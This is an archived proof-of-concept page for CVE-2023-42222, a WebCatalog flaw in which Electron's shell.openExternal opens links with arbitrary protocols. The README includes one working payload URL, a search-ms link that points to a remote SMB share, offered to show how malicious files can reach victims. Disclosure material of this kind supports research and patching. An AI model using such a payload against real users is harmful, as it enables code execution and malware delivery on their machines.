CVE-2023-42222 PoC — WebCatalog 安全漏洞

Source

https://github.com/itssixtyn3in/CVE-2023-42222

Associated Vulnerability

Title:WebCatalog 安全漏洞 (CVE-2023-42222)
Description:WebCatalog是WebCatalog公司的一个桌面应用，可以改进工作流程并提高工作效率。 WebCatalog 49.0之前版本存在安全漏洞，该漏洞源于不验证 URL 是否用于 http 或 https 资源。

Readme

# CVE-2023-42222

## Vulnerability summary
WebCatalog before version 48.4.0 calls the Electron shell.openExternal function without verifying that the URL is for an http or https resource, in some circumstances. This vulnerability allows an attacker to execute code on the victims machine by sending messages containing links with arbitrary protocols. The victim has to interact with the link and sees the URL that is opened.

## Vulnerability Scan output
![SAST](sast.JPG)

## PoC Overview
![PoC](webcatalog_gitbook.gif)

## PoC information
The vulnerability can be confirmed by syncing a page that allows arbitary URLs. If a website is synced that contains search-ms://query=PsExec.exe&crumb=location://live.sysinternals.com/tools then an external SMB connection is created. This can then be used to bypass security protections on the local machine and present malicious files to the user, which would usually be blocked.

File Snapshot


 [4.0K]  /data/pocs/2d604a14d1675e2dc0a838389811bc77551fcf5e
├── [ 923]  README.md
├── [ 42K]  sast.JPG
└── [1.2M]  webcatalog_gitbook.gif

0 directories, 3 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!